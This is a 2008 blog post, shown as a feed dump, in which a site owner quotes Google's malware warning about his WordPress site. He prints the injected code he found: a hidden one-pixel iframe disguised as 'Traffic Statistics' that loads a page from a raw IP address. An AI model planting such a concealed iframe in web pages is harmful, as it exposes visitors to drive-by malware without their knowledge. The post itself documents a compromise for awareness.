Tom Sommer's Weblog » google http://www.tomsommer.dk The Earth spins at a thousand miles an hour as we desperately try to keep from being thrown off Thu, 04 Feb 2010 10:09:41 +0000 http://wordpress.org/?v=2.9.2 en hourly 1 Malware notification from Google http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/ http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/#comments Sat, 09 Feb 2008 23:38:04 +0000 Tom Sommer http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/ I just received this from Google (No, it’s not fake).

Dear site owner or webmaster of tomsommer.dk,

We recently discovered that some of your pages can cause users to be
infected with malicious software. We have begun showing a warning page
to users who visit these pages by clicking a search result on Google.com.
Below are some example URLs on your site which can cause users to be
infected (space inserted to prevent accidental clicking in case your
mail client auto-links URLs):

http://tomsommer .dk/
http://www.tomsommer .dk/
http://tomsommer .dk/2007/

Here is a link to a sample warning page:
http://www.google.com/interstitial?url=http%3A//tomsommer.dk/

We strongly encourage you to investigate this immediately to protect
your visitors. Although some sites intentionally distribute malicious
software, in many cases the webmaster is unaware because:

1) the site was compromised
2) the site doesn’t monitor for malicious user-contributed content
3) the site displays content from an ad network that has a malicious
advertiser

If your site was compromised, it’s important to not only remove the
malicious (and usually hidden) content from your pages, but to also
identify and fix the vulnerability. We suggest contacting your hosting
provider if you are unsure of how to proceed. StopBadware also has a
resource page for securing compromised sites:
http://www.stopbadware.org/home/security

Once you’ve secured your site, you can request that the warning be
removed by visiting
http://www.google.com/support/webmasters/bin/answer.py?answer=45432
and requesting a review. If your site is no longer harmful to users,
we will remove the warning.

Sincerely,
Google Search Quality Team

They offer NO explanation or hint as to why it was marked as containing malware.

I checked my source, and right enough, it appears my Wordpress installation (which I keep very much up to date, I might add) has been compromised.

One post suddenly contained:

<!-- Traffic Statistics --><br />

<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe><br />

<!-- End Traffic Statistics -->

Pretty cool service, I suspect an exploit fixed in Wordpress 2.3.3 was used — remember to update your shit people!

]]> http://www.tomsommer.dk/2008/02/10/malware-notification-from-google/feed/ 3